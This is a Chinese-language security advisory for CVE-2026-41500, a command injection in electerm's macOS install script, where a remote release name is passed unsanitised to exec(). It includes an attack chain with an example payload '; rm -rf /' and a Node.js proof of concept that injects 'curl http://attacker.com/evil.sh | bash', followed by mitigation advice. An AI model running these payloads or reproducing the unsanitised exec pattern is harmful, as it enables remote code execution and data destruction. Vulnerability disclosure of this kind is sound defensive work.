CVE-2026-41500 electerm 命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-41500

漏洞类型

命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

electerm

漏洞概述

electerm是一款开源的终端/SSH/SFTP/Telnet/串口/RDP/VNC/Spice/FTP客户端。在3.3.8版本之前，该软件存在一个命令注入漏洞。漏洞位于npm/install.js文件的第150行，具体涉及runMac()函数。该函数在处理远程发布信息时，直接将攻击者控制的remote releaseInfo.name参数拼接到exec("open ...")命令中执行，且未进行任何有效的输入验证。这可能导致攻击者在目标系统上执行任意系统命令，从而完全控制主机。该问题已在3.3.8版本中修复。

技术细节

该漏洞的根本原因在于缺乏对用户输入的清洗和验证。在macOS环境下，受影响版本的electerm在安装或更新过程中，runMac()函数尝试使用系统命令打开特定资源。具体代码逻辑为：exec("open " + releaseInfo.name)。由于releaseInfo.name来源于远程响应，攻击者可以通过中间人攻击（MITM）或控制更新源服务器，向releaseInfo.name字段注入恶意操作系统命令。例如，通过插入分号;、反引号或$()等Shell元字符，攻击者可以截断原本的open命令并追加执行任意恶意指令。由于CVSS向量显示无需用户交互（UI:N）且无需认证（PR:N），这表明该利用过程可能是自动化的，发生在软件尝试自动更新或初始化配置时，从而导致远程代码执行（RCE）。

攻击链分析

STEP 1

步骤1

攻击者通过中间人攻击（MITM）或控制更新服务器，拦截或篡改electerm的更新响应数据。

STEP 2

步骤2

攻击者在响应数据的releaseInfo.name字段中注入恶意Shell命令（例如：; rm -rf /）。

STEP 3

步骤3

受害者的electerm客户端（版本<3.3.8）在macOS环境下调用runMac()函数处理该响应。

STEP 4

步骤4

runMac()函数将未经验证的name参数拼接到exec("open ...")中并执行系统命令。

STEP 5

步骤5

注入的恶意命令在受害者系统上执行，导致远程代码执行（RCE）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// POC for CVE-2026-41500
// This demonstrates how a malicious payload in 'releaseInfo.name' triggers the command injection.
// The vulnerable code is in npm/install.js:150 within the runMac() function.

const { exec } = require('child_process');

// Simulating the attacker-controlled object coming from a remote response
const maliciousReleaseInfo = {
  name: "malicious_app; curl http://attacker.com/evil.sh | bash; #"
};

function runMac(releaseInfo) {
  // VULNERABLE CODE: Direct concatenation of user input into exec()
  const command = "open " + releaseInfo.name;
  console.log(`Executing command: ${command}`);
  
  exec(command, (error, stdout, stderr) => {
    if (error) {
      console.error(`exec error: ${error}`);
      return;
    }
    console.log(`Output: ${stdout}`);
  });
}

// Trigger the vulnerability
runMac(maliciousReleaseInfo);

影响范围

electerm < 3.3.8

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用electerm的自动更新功能，并从官方网站手动下载安装包进行更新。同时，应检查系统日志是否存在异常的exec调用。